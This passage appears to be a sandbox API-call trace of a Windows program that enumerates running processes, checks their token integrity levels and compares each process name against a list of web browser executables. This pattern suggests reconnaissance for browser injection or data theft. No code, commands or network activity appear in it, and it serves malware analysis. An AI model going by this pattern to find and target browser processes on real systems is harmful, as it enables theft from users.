ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.814] GetLastError () returned 0x7a [0224.814] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.814] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.814] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.814] CloseHandle (hObject=0x590) returned 1 [0224.814] CloseHandle (hObject=0x584) returned 1 [0224.815] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0224.815] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0224.815] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0224.815] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0224.815] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0224.815] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0224.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x584 [0224.815] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.815] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.815] GetLastError () returned 0x7a [0224.815] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.816] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.816] CloseHandle (hObject=0x590) returned 1 [0224.816] CloseHandle (hObject=0x584) returned 1 [0224.816] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x584 [0224.816] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6e70, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.816] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.816] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.816] GetLastError () returned 0x7a [0224.817] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.817] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.817] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.817] CloseHandle (hObject=0x590) returned 1 [0224.817] CloseHandle (hObject=0x584) returned 1 [0224.817] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0224.817] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0224.817] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0224.817] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0224.817] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0224.818] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0224.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x584 [0224.818] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.818] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.818] GetLastError () returned 0x7a [0224.818] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.818] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.818] CloseHandle (hObject=0x590) returned 1 [0224.818] CloseHandle (hObject=0x584) returned 1 [0224.818] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x584 [0224.822] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6fa8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.822] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.822] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.822] GetLastError () returned 0x7a [0224.822] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.822] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.822] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.822] CloseHandle (hObject=0x590) returned 1 [0224.822] CloseHandle (hObject=0x584) returned 1 [0224.822] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0224.822] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0224.822] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0224.822] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0224.823] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0224.823] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0224.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x584 [0224.823] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.823] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.823] GetLastError () returned 0x7a [0224.823] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.823] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.823] CloseHandle (hObject=0x590) returned 1 [0224.823] CloseHandle (hObject=0x584) returned 1 [0224.823] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x584 [0224.823] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e70b8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.823] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.824] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.824] GetLastError () returned 0x7a [0224.824] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.824] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.824] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.824] CloseHandle (hObject=0x590) returned 1 [0224.824] CloseHandle (hObject=0x584) returned 1 [0224.824] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0224.824] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0224.824] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0224.824] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0224.824] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0224.824] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0224.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x584 [0224.825] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.825] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.825] GetLastError () returned 0x7a [0224.825] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.825] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.825] CloseHandle (hObject=0x590) returned 1 [0224.825] CloseHandle (hObject=0x584) returned 1 [0224.825] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x584 [0224.825] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e71f0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.825] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.825] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.825] GetLastError () returned 0x7a [0224.826] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.826] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.826] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.826] CloseHandle (hObject=0x590) returned 1 [0224.826] CloseHandle (hObject=0x584) returned 1 [0224.826] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0224.826] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0224.826] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0224.826] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0224.826] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0224.826] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0224.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x584 [0224.826] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.826] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.826] GetLastError () returned 0x7a [0224.827] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.827] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.827] CloseHandle (hObject=0x590) returned 1 [0224.827] CloseHandle (hObject=0x584) returned 1 [0224.827] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x584 [0224.827] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7320, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.827] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.827] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.827] GetLastError () returned 0x7a [0224.827] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.827] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.827] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.827] CloseHandle (hObject=0x590) returned 1 [0224.827] CloseHandle (hObject=0x584) returned 1 [0224.828] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0224.828] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0224.828] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0224.828] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0224.828] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0224.828] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0224.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x584 [0224.828] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.828] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.828] GetLastError () returned 0x7a [0224.828] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.828] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.828] CloseHandle (hObject=0x590) returned 1 [0224.828] CloseHandle (hObject=0x584) returned 1 [0224.828] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x584 [0224.828] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7460, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.828] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.828] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.829] GetLastError () returned 0x7a [0224.829] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.829] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.829] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.829] CloseHandle (hObject=0x590) returned 1 [0224.829] CloseHandle (hObject=0x584) returned 1 [0224.829] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0224.829] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0224.829] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0224.829] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0224.829] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0224.829] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0224.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x584 [0224.829] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.829] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.829] GetLastError () returned 0x7a [0224.829] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.829] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.830] CloseHandle (hObject=0x590) returned 1 [0224.830] CloseHandle (hObject=0x584) returned 1 [0224.830] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x584 [0224.830] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7578, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.830] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.830] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.830] GetLastError () returned 0x7a [0224.830] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.830] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.830] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.830] CloseHandle (hObject=0x590) returned 1 [0224.830] CloseHandle (hObject=0x584) returned 1 [0224.830] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0224.830] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0224.830] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0224.830] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0224.830] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0224.831] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0224.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x584 [0224.831] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, 